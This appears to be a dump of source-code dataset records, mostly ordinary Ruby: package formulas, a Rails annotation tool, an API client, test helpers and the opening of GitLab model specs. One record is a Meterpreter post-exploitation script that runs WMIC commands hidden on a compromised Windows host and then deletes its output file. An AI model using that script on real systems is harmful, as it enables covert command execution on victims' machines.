hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
79590b144214135b18b1b8a1bdd6f3788cb8d911 | 1,002 | class AtlassianCli < Formula
desc "Command-line interface clients for Atlassian products"
homepage "https://bobswift.atlassian.net/wiki/pages/viewpage.action?pageId=1966101"
url "https://bobswift.atlassian.net/wiki/download/attachments/16285777/atlassian-cli-9.1.0-distribution.zip"
sha256 "60c01f984a75b4e4071eca8f968cdacccf0bde469a9b21fc3abd66206346c2a1"
livecheck do
url "https://marketplace.atlassian.com/apps/10886/atlassian-command-line-interface-cli/version-history"
regex(/class="version">v?(\d+(?:\.\d+)+)</i)
end
bottle :unneeded
depends_on "openjdk"
def install
inreplace "acli.sh" do |s|
s.sub! "`find \"$directory/lib\" -name acli-*.jar`", "'#{share}/lib/acli-#{version}.jar'"
s.sub! "java", "'#{Formula["openjdk"].opt_bin}/java'"
end
bin.install "acli.sh" => "acli"
share.install "lib", "license"
end
test do
assert_match "Welcome to the Bob Swift Atlassian CLI", shell_output("#{bin}/acli --help 2>&1 | head")
end
end
| 34.551724 | 110 | 0.700599 |
919e2c2f1408a503ee9f16e6411e0c6c5cbcafac | 1,533 | #
# Copyright 2013-2014 Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Install bzip2 and its shared library, libbz2.so
# This library object is required for building Python with the bz2 module,
# and should be picked up automatically when building Python.
name "bzip2"
default_version "1.0.6"
dependency "zlib"
dependency "openssl"
source url: "http://www.bzip.org/#{version}/#{name}-#{version}.tar.gz",
md5: "00b516f4704d4a7cb50a1d97e6e8e15b"
relative_path "#{name}-#{version}"
build do
env = with_standard_compiler_flags(with_embedded_path)
# Avoid warning where .rodata cannot be used when making a shared object
env["CFLAGS"] << " -fPIC"
# The list of arguments to pass to make
args = "PREFIX='#{install_dir}/embedded' VERSION='#{version}'"
patch source: 'makefile_take_env_vars.patch'
patch source: 'soname_install_dir.patch' if mac_os_x? # Patched line, see
make "#{args}", env: env
make "#{args} -f Makefile-libbz2_so", env: env
make "#{args} install", env: env
end
| 32.617021 | 76 | 0.734508 |
288a274598c063c91654171d315e58474aed2ef1 | 308 | require 'rubygems'
require 'simplecov'
SimpleCov.start do
add_filter "/spec/"
end
require 'rspec'
require 'rspec/its'
Dir[File.expand_path(File.join(File.dirname(__FILE__),'support','**','*.rb'))].each {|f| require f}
require 'conjur/api'
require 'conjur-asset-aws'
require 'conjur-asset-host-factory'
| 19.25 | 99 | 0.727273 |
0342dc2c56f3e29c4003e89fe72b88bfd54dd158 | 7,193 | module Aam
class Annotation
MAGIC_COMMENT_LINE = "# -*- coding: utf-8 -*-\n"
attr_accessor :counts, :options
def self.run(options = {})
new(options).run
end
def initialize(options = {})
@options = {
:root_dir => Rails.root,
:dry_run => false,
:skip_columns => [], # %w(id created_at updated_at),
:models => ENV["MODEL"].presence || ENV["MODELS"].presence,
}.merge(options)
@counts = Hash.new(0)
STDOUT.sync = true
end
def run
schema_info_text_write
puts
model_file_write_all
end
def model_file_write_all
target_ar_klasses_from_model_filenames.each do |klass|
begin
model = Model.new(self, klass)
model.write_to_relation_files
rescue ActiveRecord::ActiveRecordError => error
if @options[:debug]
puts "--------------------------------------------------------------------------------"
p error
puts "--------------------------------------------------------------------------------"
end
@counts[:error] += 1
end
end
puts
puts "#{@counts[:success]} success, #{@counts[:skip]} skip, #{@counts[:error]} errors"
end
def schema_info_text_write
@all = []
target_ar_klasses_from_model_require_and_ar_subclasses.each do |klass|
begin
model = Model.new(self, klass)
@all << model.schema_info
rescue ActiveRecord::ActiveRecordError => error
end
end
file = root_dir.join("db", "schema_info.txt")
magic_comment = "-*- truncate-lines: t -*-"
file.write("#{magic_comment}\n\n#{@all.join}")
puts "output: #{file} (#{@all.size} counts)"
end
def root_dir
@root_dir ||= Pathname(@options[:root_dir].to_s).expand_path
end
private
class Model
def initialize(base, klass)
@base = base
@klass = klass
end
def schema_info
@schema_info ||= Generator.new(@klass, @base.options).generate + "\n"
end
def write_to_relation_files
puts ""
puts "--> #{@klass}"
target_files = search_paths.collect {|search_path|
v = Pathname.glob((@base.root_dir + search_path).expand_path)
v.reject{|e|e.to_s.include?("node_modules")}
}.flatten.uniq
target_files.each {|e| annotate_write(e) }
end
private
# TODO: アプリの構成に依存しすぎ?
def search_paths
paths = []
paths << "app/models/**/#{@klass.name.underscore}.rb"
# paths << "app/models/**/#{@klass.name.underscore}_{search,observer,callback,sweeper}.rb"
paths << "test/unit/**/#{@klass.name.underscore}_test.rb"
paths << "test/fixtures/**/#{@klass.name.underscore.pluralize}.yml"
paths << "test/unit/helpers/**/#{@klass.name.underscore}_helper_test.rb"
paths << "spec/models/**/#{@klass.name.underscore}_spec.rb"
paths << "{test,spec}/**/#{@klass.name.underscore}_factory.rb"
[:pluralize, :singularize].each{|method|
prefix = @klass.name.underscore.send(method)
[
"app/controllers/**/#{prefix}_controller.rb",
"app/helpers/**/#{prefix}_helper.rb",
"test/functional/**/#{prefix}_controller_test.rb",
"test/factories/**/#{prefix}_factory.rb",
"test/factories/**/#{prefix}.rb",
"db/seeds/**/{[0-9]*_,}#{prefix}_setup.rb",
"db/seeds/**/{[0-9]*_,}#{prefix}_seed.rb",
"db/seeds/**/{[0-9]*_,}#{prefix}.rb",
"db/migrate/*_{create,to,from}_#{prefix}.rb",
"spec/**/#{prefix}_{controller,helper}_spec.rb",
].each{|path|
paths << path
}
}
paths
end
def annotate_write(file_name)
body = file_name.read
regexp = /^#{SCHEMA_HEADER}\n(#.*\n)*\n+/
if body.match(regexp)
body = body.sub(regexp, schema_info)
elsif body.include?(MAGIC_COMMENT_LINE)
body = body.sub(/#{Regexp.escape(MAGIC_COMMENT_LINE)}\s*/) {MAGIC_COMMENT_LINE + schema_info}
else
body = body.sub(/^\s*/, schema_info)
end
body = insert_magick_comment(body)
unless @base.options[:dry_run]
file_name.write(body)
end
puts "write: #{file_name}"
@base.counts[:success] += 1
end
def insert_magick_comment(body, force = false)
if force
body = body.sub(/#{Regexp.escape(MAGIC_COMMENT_LINE)}\s*/, "")
end
unless body.include?(MAGIC_COMMENT_LINE)
body = body.sub(/^\s*/, MAGIC_COMMENT_LINE)
end
body
end
end
#
# テーブルを持っているクラスたち
#
def target_ar_klasses
target_ar_klasses_from_model_require_and_ar_subclasses
# ActiveRecord::Base.subclasses
end
# すべての app/models/**/*.rb を require したあと ActiveRecord::Base.subclasses を参照
def target_ar_klasses_from_model_require_and_ar_subclasses
target_model_files.each do |file|
begin
silence_warnings do
require file
end
puts "require: #{file}"
rescue Exception
end
end
if defined?(ApplicationRecord)
ApplicationRecord.subclasses
else
ActiveRecord::Base.subclasses
end
end
# app/models/* のファイル名を constantize してみることでクラスを収集する
def target_ar_klasses_from_model_filenames
models = []
target_model_files.each do |file|
file = file.expand_path
klass = nil
md = file.to_s.match(/\A.*\/app\/models\/(.*)\.rb\z/)
underscore_class_name = md.captures.first
class_name = underscore_class_name.camelize # classify だと boss が bos になってしまう
begin
klass = class_name.constantize
rescue LoadError => error # LoadError は rescue nil では捕捉できないため
puts "#{class_name} に対応するファイルは見つかりませんでした : #{error}"
rescue
end
# klass.class == Class を入れないと [] < ActiveRecord::Base のときにエラーになる
if klass && klass.class == Class && klass < ActiveRecord::Base && !klass.abstract_class?
# puts "#{file} は ActiveRecord::Base のサブクラスなので対象とします。"
puts "model: #{file}"
models << klass
else
# puts "#{file} (クラス名:#{class_name}) は ActiveRecord::Base のサブクラスではありませんでした。"
end
end
models
end
#
# 対象のモデルファイル
#
def target_model_files
files = []
files += Pathname.glob("#{root_dir}/app/models/**/*.rb")
files += Pathname.glob("#{root_dir}/vendor/plugins/*/app/models/**/*.rb")
if @options[:models]
@options[:models].split(",").collect { |m|
files.find_all { |e|
e.basename(".*").to_s.match(/#{m.camelize}|#{m.underscore}/i)
}
}.flatten.uniq
else
files
end
end
end
end
if $0 == __FILE__
require "active_record"
require "rails"
require "table_format"
obj = Aam::Annotation.new(root_dir: "~/src/shogi_web")
tp obj.send(:target_model_files)
tp obj.send(:target_ar_klasses_from_model_filenames)
end
| 31.138528 | 103 | 0.565133 |
39d8a987eadec44bca6ccad8741e95cff0cbe88d | 330 | class Subethaedit < Cask
url 'http://www.codingmonkeys.de/subethaedit/SubEthaEdit.zip'
appcast 'http://www.codingmonkeys.de/subethaedit/appcast.rss'
homepage 'http://www.codingmonkeys.de/subethaedit/'
version '3.5.4'
sha256 '72d3948e5da167ac3113ec8f56aa424965b0ec153df4ba8042ce5893a547e290'
link 'SubEthaEdit.app'
end
| 36.666667 | 75 | 0.793939 |
188f6cf6c4338a2c0c89fa9ce40bf02edcbce77d | 336 | # frozen_string_literal: false
module SensuPluginsMeta
# The version of this Sensu plugin.
module Version
# The major version.
MAJOR = 1
# The minor version.
MINOR = 0
# The patch version.
PATCH = 10
# Concat them into a version string
VER_STRING = [MAJOR, MINOR, PATCH].compact.join('.')
end
end
| 21 | 56 | 0.660714 |
6a2aeaabe978f45223975f904293488808e3c9c9 | 2,404 | require 'rails_helper'
RSpec.describe 'Participants::Devise::Sessions', type: :feature do
let(:user) { create(:client) }
describe 'reset password' do
context 'with valid email' do
it 'update password' do
visit new_client_password_path(user)
fill_in 'client_email', with: user.email
expect do
submit_form
end.to change(ActionMailer::Base.deliveries, :count).by(1)
token = user.send(:set_reset_password_token)
visit edit_client_password_url(reset_password_token: token)
fill_in 'client_password', with: 'Passw0rd!'
fill_in 'client_password_confirmation', with: 'Passw0rd!'
submit_form
expect(page).to have_current_path(participants_root_path)
expect(page).to have_flash(:info, text: devise_password_updated_msg)
end
it 'not update password with invalid data' do
token = user.send(:set_reset_password_token)
visit edit_client_password_url(reset_password_token: token)
fill_in 'client_password', with: ''
fill_in 'client_password_confirmation', with: '123'
submit_form
expect(page).to have_current_path(client_password_path)
expect(page).to have_flash(:danger, text: flash_errors_msg)
expect(page).to have_message(sf_blank_error_msg, in: 'div.client_password')
fill_in 'client_password', with: '12'
fill_in 'client_password_confirmation', with: '123'
submit_form
expect(page).to have_message(sf_minimum_pwd_length, in: 'div.client_password')
expect(page).to have_message(sf_confirmation_pwd_error_msg,
in: 'div.client_password_confirmation')
end
it 'not update password with invalid token' do
visit edit_client_password_url(reset_password_token: 'aaa')
submit_form
expect(page).to have_message(sf_invalid_error_msg, in: 'div.client_reset_password_token')
end
end
context 'with invalid email' do
it 'not send email' do
visit new_client_password_path(user)
fill_in 'client_email', with: '[email protected]'
submit_form
expect(page).to have_current_path(client_password_path)
expect(page).to have_flash(:danger, text: flash_errors_msg)
expect(page).to have_message(sf_not_found_msg, in: 'div.client_email')
end
end
end
end
| 34.84058 | 97 | 0.682196 |
bb6196782d067aa944264d9cdf7299278fa71cf0 | 1,002 | require_relative 'boot'
require 'rails'
require 'active_model/railtie'
require 'active_job/railtie'
require 'active_record/railtie'
require 'action_controller/railtie'
require 'action_mailer/railtie'
require 'action_view/railtie'
require 'sprockets/railtie'
require 'rails/test_unit/railtie'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module SalesUp
# Application is responsible to setup some rails configurations related to
# the application
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
config.autoload_paths += %W[#{config.root}/lib]
# Settings in config/environments/* take precedence over those
# specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 31.3125 | 79 | 0.772455 |
28b3658a681f006467c64acaa143cb4918fa8c96 | 1,485 | # -*- encoding: utf-8 -*-
# stub: jekyll-mentions 1.4.1 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-mentions".freeze
s.version = "1.4.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["GitHub, Inc.".freeze]
s.date = "2018-08-08"
s.email = "[email protected]".freeze
s.homepage = "https://github.com/jekyll/jekyll-mentions".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.1.4".freeze
s.summary = "@mention support for your Jekyll site".freeze
s.installed_by_version = "3.1.4" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<html-pipeline>.freeze, ["~> 2.3"])
s.add_runtime_dependency(%q<jekyll>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<rake>.freeze, ["~> 12.0"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<rubocop>.freeze, ["~> 0.57.2"])
else
s.add_dependency(%q<html-pipeline>.freeze, ["~> 2.3"])
s.add_dependency(%q<jekyll>.freeze, ["~> 3.0"])
s.add_dependency(%q<rake>.freeze, ["~> 12.0"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.0"])
s.add_dependency(%q<rubocop>.freeze, ["~> 0.57.2"])
end
end
| 38.076923 | 112 | 0.670034 |
6a3fbea7d10ace58c6167f11287c38577f3bae5b | 626 | def solution(n, p, q)
primes = Array.new(n + 1, 0)
2.upto(Math.sqrt(n)) do |i|
next if primes[i] > 0
(i + i..n).step(i) do |j|
next if primes[j] > 0
primes[j] = i
end
end
semiprimes = Array.new(n + 1, 0)
2.upto(n) do |i|
x = i
while primes[x] > 0
x = x / primes[x]
semiprimes[i] += 1
end
semiprimes[i] += 1 if i > 1
end
prefix_sums = Array.new(n + 2, 0)
4.upto(n) do |i|
prefix_sums[i + 1] = prefix_sums[i]
prefix_sums[i + 1] += 1 if semiprimes[i] == 2
end
0.upto(p.size - 1).map do |i|
prefix_sums[q[i] + 1] - prefix_sums[p[i]]
end
end
| 20.193548 | 49 | 0.520767 |
915f84ceacdf6722f9e88d9d279481d72dc4a271 | 1,024 | # frozen_string_literal: true
require 'pry'
require 'bundler/setup'
require 'k_fileset'
# require 'k_usecases'
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
config.filter_run_when_matching :focus
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
# # ----------------------------------------------------------------------
# # Usecase Documentor
# # ----------------------------------------------------------------------
# KUsecases.configure(config)
# config.extend KUsecases
# config.before(:context, :usecases) do
# puts '-' * 70
# puts self.class
# puts '-' * 70
# @documentor = KUsecases::Documentor.new(self.class)
# end
# config.after(:context, :usecases) do
# @documentor.render
# puts '-' * 70
# puts self.class
# puts '-' * 70
# end
end
| 24.380952 | 76 | 0.580078 |
1d86daff0be2dfea10e90a85b8351b40b15df65b | 1,058 | # frozen_string_literal: true
module SolidusShipstation
module Api
class Client
class << self
def from_config
new(
request_runner: RequestRunner.from_config,
error_handler: SolidusShipstation.config.error_handler,
shipment_serializer: SolidusShipstation.config.api_shipment_serializer,
)
end
end
attr_reader :request_runner, :error_handler, :shipment_serializer
def initialize(request_runner:, error_handler:, shipment_serializer:)
@request_runner = request_runner
@error_handler = error_handler
@shipment_serializer = shipment_serializer
end
def bulk_create_orders(shipments)
params = shipments.map do |shipment|
shipment_serializer.call(shipment)
rescue StandardError => e
error_handler.call(e, shipment: shipment)
nil
end.compact
return if params.empty?
request_runner.call(:post, '/orders/createorders', params)
end
end
end
end
| 27.128205 | 83 | 0.660681 |
4a10f8e981b290de09e9f936c6b717c1c1fd1d0d | 3,670 | # $Id$
#Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
# and Windows XP and Windows 2008 targets.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
#Verion: 0.1
################## Variable Declarations ##################
session = client
wininfo = client.sys.config.sysinfo
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-c" => [ true,"Command to execute. The command must be enclosed in double quotes."],
"-f" => [ true,"File where to saved output of command."],
"-s" => [ true,"Text file with list of commands, one per line."]
)
#Setting Argument variables
commands = []
script = []
outfile = nil
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in a array, returs string
def wmicexec(session,wmiccmds= nil)
windr = ''
tmpout = ''
windrtmp = ""
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"
puts wmicfl
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finnishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
print_line "."
found = 0
end
end
end
r.close
end
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
wmioutfile.close
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout
end
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each_line do |d|
output.puts(d)
end
output.close
end
def usage
print_line("Windows WMIC Command Execution Meterpreter Script ")
puts @@exec_opts.usage
print_line("USAGE:")
print_line("run wmic -c \"WMIC Command Argument\"\n")
print_line("NOTE:")
print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
print_line("Example:")
print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
end
################## Main ##################
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-c"
if !val
raise "-c requires an argument"
end
commands.concat(val.split("/"))
when "-s"
if !val
raise "-s requires an argument"
end
script = val
if not ::File.exists?(script)
raise "Command List File does not exists!"
else
::File.open(script, "r").each_line do |line|
commands << line.chomp
end
end
when "-f"
if !val
raise "-f requires an argument"
end
outfile = val
when "-h"
usage
raise RuntimeError, "Usage"
else
raise RuntimeError, "Unknown option: #{opt}"
end
if commands.empty?
usage
raise RuntimeError, "Empty command list"
end
}
if outfile == nil
print_status wmicexec(session,commands)
else
print_status("Saving output of WMIC to #{outfile}")
filewrt(outfile, wmicexec(session,commands))
end
| 28.230769 | 137 | 0.66376 |
ed4d0bccfc1589886cfa5906c20929d6c740dc7e | 175 | class HomeController < ApplicationController
skip_before_action :authenticate_user!, only: [:index]
def index
@photos = Photo.all
@user = current_user
end
end
| 19.444444 | 56 | 0.731429 |
bb848be6e92634e8a8dc68b3f702fda239d3d40e | 1,000 | # typed: true
class Mutations::Stores::DeleteStore < Mutations::BaseMutation
description "Delete a game store. **Only available to moderators and admins using a first-party OAuth Application.**"
argument :store_id, ID, required: true, description: 'The ID of the store to delete.'
field :deleted, Boolean, null: true, description: "Whether the store was successfully deleted."
sig { params(store_id: T.any(String, Integer)).returns(T::Hash[Symbol, T::Boolean]) }
def resolve(store_id:)
store = Store.find(store_id)
raise GraphQL::ExecutionError, store.errors.full_messages.join(", ") unless store.destroy
{
deleted: true
}
end
sig { params(object: T.untyped).returns(T::Boolean) }
def authorized?(object)
require_permissions!(:first_party)
store = Store.find(object[:store_id])
raise GraphQL::ExecutionError, "You aren't allowed to delete this store." unless StorePolicy.new(@context[:current_user], store).destroy?
return true
end
end
| 33.333333 | 141 | 0.719 |
61fbb4f8243a8dd48755351eac77fc99e3022871 | 291 | require 'gabba'
require 'rspec'
require 'webmock/rspec'
WebMock.disable_net_connect!
def stub_analytics(expected_params)
stub_request(
:get,
/www.google-analytics.com\/__utm.gif\?utmac=#{expected_params[:utmac]}&.*/
).to_return(:status => 200, :body => '', :headers => {})
end
| 22.384615 | 78 | 0.694158 |
1ac4f37834bc459930d7f83983de4afe57965755 | 4,508 | # frozen_string_literal: true
module EE
module API
module Helpers
module SettingsHelpers
extend ActiveSupport::Concern
prepended do
params :optional_params_ee do
optional :elasticsearch_aws, type: Grape::API::Boolean, desc: 'Enable support for AWS hosted elasticsearch'
given elasticsearch_aws: ->(val) { val } do
optional :elasticsearch_aws_access_key, type: String, desc: 'AWS IAM access key'
requires :elasticsearch_aws_region, type: String, desc: 'The AWS region the elasticsearch domain is configured'
optional :elasticsearch_aws_secret_access_key, type: String, desc: 'AWS IAM secret access key'
end
optional :elasticsearch_indexing, type: Grape::API::Boolean, desc: 'Enable Elasticsearch indexing'
given elasticsearch_indexing: ->(val) { val } do
optional :elasticsearch_search, type: Grape::API::Boolean, desc: 'Enable Elasticsearch search'
optional :elasticsearch_pause_indexing, type: Grape::API::Boolean, desc: 'Pause Elasticsearch indexing'
requires :elasticsearch_url, type: String, desc: 'The url to use for connecting to Elasticsearch. Use a comma-separated list to support clustering (e.g., "http://localhost:9200, http://localhost:9201")'
optional :elasticsearch_limit_indexing, type: Grape::API::Boolean, desc: 'Limit Elasticsearch to index certain namespaces and projects'
end
given elasticsearch_limit_indexing: ->(val) { val } do
optional :elasticsearch_namespace_ids, type: Array[Integer], coerce_with: ::API::Validations::Types::CommaSeparatedToIntegerArray.coerce, desc: 'The namespace ids to index with Elasticsearch.'
optional :elasticsearch_project_ids, type: Array[Integer], coerce_with: ::API::Validations::Types::CommaSeparatedToIntegerArray.coerce, desc: 'The project ids to index with Elasticsearch.'
end
optional :email_additional_text, type: String, desc: 'Additional text added to the bottom of every email for legal/auditing/compliance reasons'
optional :default_project_deletion_protection, type: Grape::API::Boolean, desc: 'Disable project owners ability to delete project'
optional :deletion_adjourned_period, type: Integer, desc: 'Number of days between marking project as deleted and actual removal'
optional :help_text, type: String, desc: 'GitLab server administrator information'
optional :repository_size_limit, type: Integer, desc: 'Size limit per repository (MB)'
optional :file_template_project_id, type: Integer, desc: 'ID of project where instance-level file templates are stored.'
optional :usage_ping_enabled, type: Grape::API::Boolean, desc: 'Every week GitLab will report license usage back to GitLab, Inc.'
optional :updating_name_disabled_for_users, type: Grape::API::Boolean, desc: 'Flag indicating if users are permitted to update their profile name'
optional :disable_overriding_approvers_per_merge_request, type: Grape::API::Boolean, desc: 'Disable Users ability to overwrite approvers in merge requests.'
optional :prevent_merge_requests_author_approval, type: Grape::API::Boolean, desc: 'Disable Merge request author ability to approve request.'
optional :prevent_merge_requests_committers_approval, type: Grape::API::Boolean, desc: 'Disable Merge request committer ability to approve request.'
optional :npm_package_requests_forwarding, type: Grape::API::Boolean, desc: 'NPM package requests are forwarded to npmjs.org if not found on GitLab.'
optional :group_owners_can_manage_default_branch_protection, type: Grape::API::Boolean, desc: 'Allow owners to manage default branch protection in groups'
optional :maintenance_mode, type: Grape::API::Boolean, desc: 'When instance is in maintenance mode, non-admin users can sign in with read-only access and make read-only API requests'
optional :maintenance_mode_message, type: String, desc: 'Message displayed when instance is in maintenance mode'
end
end
class_methods do
extend ::Gitlab::Utils::Override
override :optional_attributes
def optional_attributes
super + EE::ApplicationSettingsHelper.possible_licensed_attributes
end
end
end
end
end
end
| 71.555556 | 216 | 0.712733 |
e93a4e62244f33fbe1716ac00251ee8ee4cef1ad | 57,930 | require 'spec_helper'
describe Project, models: true do
describe 'associations' do
it { is_expected.to belong_to(:group) }
it { is_expected.to belong_to(:namespace) }
it { is_expected.to belong_to(:creator).class_name('User') }
it { is_expected.to have_many(:users) }
it { is_expected.to have_many(:services) }
it { is_expected.to have_many(:events).dependent(:destroy) }
it { is_expected.to have_many(:merge_requests).dependent(:destroy) }
it { is_expected.to have_many(:issues).dependent(:destroy) }
it { is_expected.to have_many(:milestones).dependent(:destroy) }
it { is_expected.to have_many(:project_members).dependent(:destroy) }
it { is_expected.to have_many(:users).through(:project_members) }
it { is_expected.to have_many(:requesters).dependent(:destroy) }
it { is_expected.to have_many(:notes).dependent(:destroy) }
it { is_expected.to have_many(:snippets).class_name('ProjectSnippet').dependent(:destroy) }
it { is_expected.to have_many(:deploy_keys_projects).dependent(:destroy) }
it { is_expected.to have_many(:deploy_keys) }
it { is_expected.to have_many(:hooks).dependent(:destroy) }
it { is_expected.to have_many(:protected_branches).dependent(:destroy) }
it { is_expected.to have_one(:forked_project_link).dependent(:destroy) }
it { is_expected.to have_one(:slack_service).dependent(:destroy) }
it { is_expected.to have_one(:mattermost_service).dependent(:destroy) }
it { is_expected.to have_one(:pushover_service).dependent(:destroy) }
it { is_expected.to have_one(:asana_service).dependent(:destroy) }
it { is_expected.to have_many(:boards).dependent(:destroy) }
it { is_expected.to have_one(:campfire_service).dependent(:destroy) }
it { is_expected.to have_one(:drone_ci_service).dependent(:destroy) }
it { is_expected.to have_one(:emails_on_push_service).dependent(:destroy) }
it { is_expected.to have_one(:builds_email_service).dependent(:destroy) }
it { is_expected.to have_one(:emails_on_push_service).dependent(:destroy) }
it { is_expected.to have_one(:irker_service).dependent(:destroy) }
it { is_expected.to have_one(:pivotaltracker_service).dependent(:destroy) }
it { is_expected.to have_one(:hipchat_service).dependent(:destroy) }
it { is_expected.to have_one(:flowdock_service).dependent(:destroy) }
it { is_expected.to have_one(:assembla_service).dependent(:destroy) }
it { is_expected.to have_one(:slack_slash_commands_service).dependent(:destroy) }
it { is_expected.to have_one(:mattermost_slash_commands_service).dependent(:destroy) }
it { is_expected.to have_one(:gemnasium_service).dependent(:destroy) }
it { is_expected.to have_one(:buildkite_service).dependent(:destroy) }
it { is_expected.to have_one(:bamboo_service).dependent(:destroy) }
it { is_expected.to have_one(:teamcity_service).dependent(:destroy) }
it { is_expected.to have_one(:jira_service).dependent(:destroy) }
it { is_expected.to have_one(:redmine_service).dependent(:destroy) }
it { is_expected.to have_one(:custom_issue_tracker_service).dependent(:destroy) }
it { is_expected.to have_one(:bugzilla_service).dependent(:destroy) }
it { is_expected.to have_one(:gitlab_issue_tracker_service).dependent(:destroy) }
it { is_expected.to have_one(:external_wiki_service).dependent(:destroy) }
it { is_expected.to have_one(:project_feature).dependent(:destroy) }
it { is_expected.to have_one(:statistics).class_name('ProjectStatistics').dependent(:delete) }
it { is_expected.to have_one(:import_data).class_name('ProjectImportData').dependent(:destroy) }
it { is_expected.to have_one(:last_event).class_name('Event') }
it { is_expected.to have_one(:forked_from_project).through(:forked_project_link) }
it { is_expected.to have_many(:commit_statuses) }
it { is_expected.to have_many(:pipelines) }
it { is_expected.to have_many(:builds) }
it { is_expected.to have_many(:runner_projects) }
it { is_expected.to have_many(:runners) }
it { is_expected.to have_many(:variables) }
it { is_expected.to have_many(:triggers) }
it { is_expected.to have_many(:labels).class_name('ProjectLabel').dependent(:destroy) }
it { is_expected.to have_many(:users_star_projects).dependent(:destroy) }
it { is_expected.to have_many(:environments).dependent(:destroy) }
it { is_expected.to have_many(:deployments).dependent(:destroy) }
it { is_expected.to have_many(:todos).dependent(:destroy) }
it { is_expected.to have_many(:releases).dependent(:destroy) }
it { is_expected.to have_many(:lfs_objects_projects).dependent(:destroy) }
it { is_expected.to have_many(:project_group_links).dependent(:destroy) }
it { is_expected.to have_many(:notification_settings).dependent(:destroy) }
it { is_expected.to have_many(:forks).through(:forked_project_links) }
context 'after initialized' do
it "has a project_feature" do
project = FactoryGirl.build(:project)
expect(project.project_feature.present?).to be_present
end
end
describe '#members & #requesters' do
let(:project) { create(:empty_project, :public, :access_requestable) }
let(:requester) { create(:user) }
let(:developer) { create(:user) }
before do
project.request_access(requester)
project.team << [developer, :developer]
end
describe '#members' do
it 'includes members and exclude requesters' do
member_user_ids = project.members.pluck(:user_id)
expect(member_user_ids).to include(developer.id)
expect(member_user_ids).not_to include(requester.id)
end
end
describe '#requesters' do
it 'does not include requesters' do
requester_user_ids = project.requesters.pluck(:user_id)
expect(requester_user_ids).to include(requester.id)
expect(requester_user_ids).not_to include(developer.id)
end
end
end
describe '#boards' do
it 'raises an error when attempting to add more than one board to the project' do
subject.boards.build
expect { subject.boards.build }.to raise_error(Project::BoardLimitExceeded, 'Number of permitted boards exceeded')
expect(subject.boards.size).to eq 1
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Gitlab::ConfigHelper) }
it { is_expected.to include_module(Gitlab::ShellAdapter) }
it { is_expected.to include_module(Gitlab::VisibilityLevel) }
it { is_expected.to include_module(Gitlab::CurrentSettings) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
end
describe 'validation' do
let!(:project) { create(:project) }
it { is_expected.to validate_presence_of(:name) }
it { is_expected.to validate_uniqueness_of(:name).scoped_to(:namespace_id) }
it { is_expected.to validate_length_of(:name).is_at_most(255) }
it { is_expected.to validate_presence_of(:path) }
it { is_expected.to validate_uniqueness_of(:path).scoped_to(:namespace_id) }
it { is_expected.to validate_length_of(:path).is_at_most(255) }
it { is_expected.to validate_length_of(:description).is_at_most(2000) }
it { is_expected.to validate_presence_of(:creator) }
it { is_expected.to validate_presence_of(:namespace) }
it { is_expected.to validate_presence_of(:repository_storage) }
it 'does not allow new projects beyond user limits' do
project2 = build(:project)
allow(project2).to receive(:creator).and_return(double(can_create_project?: false, projects_limit: 0).as_null_object)
expect(project2).not_to be_valid
expect(project2.errors[:limit_reached].first).to match(/Personal project creation is not allowed/)
end
